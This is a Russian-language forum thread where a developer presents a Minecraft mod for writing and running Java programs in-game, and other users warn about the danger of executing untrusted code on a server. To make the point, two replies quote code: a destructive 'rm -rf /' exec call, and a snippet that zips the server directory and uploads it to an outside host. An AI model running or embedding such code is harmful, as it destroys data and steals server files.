[1.6.4]Plumbum40 Mod

Появилась идея сделать мод похожий на ComputerCraft или OpenComputers только написание программ в них было на джаве.За 2 дня все же смог сделать самую основу:написание кода,компилирование и запуск программы прямо из майнача.
Так пока что выглядит тестовое гуи
1.png

Первая строка название файла,дальше идёт код.
При нажатие клавиши end создается java файл, компилируется и запускается получившийся class файл,все эти действия просматриваются в консоли
2.png

Вот сами файлы программы
3.png

И результат работы программы
4.png

Так же кто заинтересовался и может помочь с созданием мода пишите...
 
1,087
2
Вау, очень прикольно. Только надо сделать так, чтобы можно было делать прошу из нескольких прог. А если сможешь - сделай подключение других либ :))))))
 
когда запускаешь файл через "java ...аргументы... названиекласса"в аргументах можно указать количество выделеной памяти
 
471
5
RedEnergy написал(а):
Это не панацея. Ограничение выделяемой памяти защитит от одной проблемы когда их десятки. Выполнять пользовательский java код на своем сервере это все равно хранить полоний под кроватью

ахахахах цитата дня :D
 
183
1
4
Dragon2488 написал(а):
Код:
Runtime.getRuntime().exec("rm -rf /");
<3
Код:
ZipUtils.pack(new File("./../"), new File("./../server.zip"));
HttpPost post = new HttpPost("sliv.ru/upload");
MultipartEntity entity = new MultipartEntity(){{
   addPart("file", new File("./../server.zip"));
}};
new DefaultHttpClient().execute(post);
 
808
3
124
Зная, как часто выходят обновления безопасности для джавы, и как редко я обновляю джаву на сервере, я никогда не рискнул бы запускать непроверенный джава-код. Даже правильно настроенный SecurityManager не спасёт. Это же джава. Тут всегда пытались сделать максимальную безопасность, и всегда это получалось хуже всего остального. Про полоний метко сказано.
 
GloomyFolken написал(а):
Зная, как часто выходят обновления безопасности для джавы, и как редко я обновляю джаву на сервере, я никогда не рискнул бы запускать непроверенный джава-код. Даже правильно настроенный SecurityManager не спасёт. Это же джава. Тут всегда пытались сделать максимальную безопасность, и всегда это получалось хуже всего остального. Про полоний метко сказано.
Это для апплетов.
Не вижу разницы с c# или c++, те же грабли, только состав чуть другой.
 

CumingSoon

Местный стендапер
1,634
12
269
Это что,в CC можно скачать папку с сервером?
 
1,990
18
105
Нет, его, вроде, не аутисты (не в обиду ТС) проектировали и не дают доступ ко всему подряд (:)
 
Сверху